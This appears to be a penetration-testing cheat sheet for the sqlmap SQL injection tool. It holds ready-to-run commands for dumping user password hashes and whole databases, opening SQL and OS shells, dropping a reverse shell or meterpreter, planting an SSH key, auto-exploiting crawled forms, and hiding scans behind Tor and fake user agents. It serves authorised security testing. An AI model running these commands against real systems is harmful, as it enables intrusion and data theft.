SQLMap

sqlmap.py

Basic arguments for SQLmap

sqlmap --url="<url>" 
-p username 
--user-agent=SQLMAP 
--random-agent 
--threads=10 
--level=5
--risk=3  
--eta 
--dbms=MySQL 
--os=Linux 
--banner 
--is-dba 
--users 
--passwords 
--current-user 
--dbs
  1. -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")

  2. -p TESTPARAMETER Testable parameter(s)

  3. By default sqlmap performs HTTP requests with the following User-Agent header value:

    sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

    However, it is possible to fake it with the option --user-agent by providing custom User-Agent as the option's argument.

  4. --random-agent, sqlmap will randomly select a User-Agent from the ./txt/user-agents.txt

  5. --threads=THREADS Max number of concurrent HTTP(s) requests (default 1)

  6. --level=LEVEL Level of tests to perform (1-5, default 1)

  7. --risk=RISK Risk of tests to perform (1-3, default 1)

  8. --eta Display for each output the estimated time of arrival

  9. --dbms=DBMS Force back-end DBMS to provided value

  10. --os=OS Force back-end DBMS operating system to provided value

  11. -b, --banner Retrieve DBMS banner

  12. --is-dba Detect if the DBMS current user is DBA

  13. --users Enumerate DBMS users

  14. --passwords Enumerate DBMS users password hashes

  15. --current-user Retrieve DBMS current user

  16. --dbs Enumerate DBMS databases

Load a request file and use mobile user-agent

sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
  • -r REQUESTFILE Load HTTP request from a file

  • --safe-url=SAFEURL URL address to visit frequently during testing

  • --mobile Imitate smartphone through HTTP User-Agent header

  • --safe-freq=SAFE.. Regular requests between visits to a safe URL

python sqlmap.py -u "http://example.com" --data "username=admin&password=pass"  --headers="x-forwarded-for:127.0.0.1*"
  • -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")

  • --data=DATA Data string to be sent through POST (e.g. "id=1")

  • --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123")

  • The injection is located at the '*'

Second-order attack

Options: --second-url and --second-req

Second-order SQL injection attack is an attack where result(s) of an injected payload in one vulnerable page is shown (reflected) at the other (e.g. frame). Usually that's happening because of database storage of user provided input at the original vulnerable page.

You can manually tell sqlmap to test for this type of SQL injection by using option --second-order with the URL address or --second-req with request file for sending to the server where results are being shown.

sqlmap -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3

sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Shell

SQL Shell
python sqlmap.py -u "http://example.com/?id=1"  -p id --sql-shell

Simple Shell
python sqlmap.py -u "http://example.com/?id=1"  -p id --os-shell

Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1"  -p id --os-pwn

SSH Shell by dropping an SSH key
python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/

Crawl a website with SQLmap and auto-exploit

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
  • --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers

  • --crawl = how deep you want to crawl a site

  • --forms = Parse and test forms

TOR

sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5

Proxy

sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080"
sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080"  -f  --time-sec 15 --level 3

Using suffix to tamper the injection

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

General tamper option

tamper=name_of_the_tamper

Tamper list

SQLmap without SQL injection

You can use SQLmap to access a database via its port instead of a URL.

sqlmap.py -d "mysql://user:pass@ip/database" --dump-all 

Last updated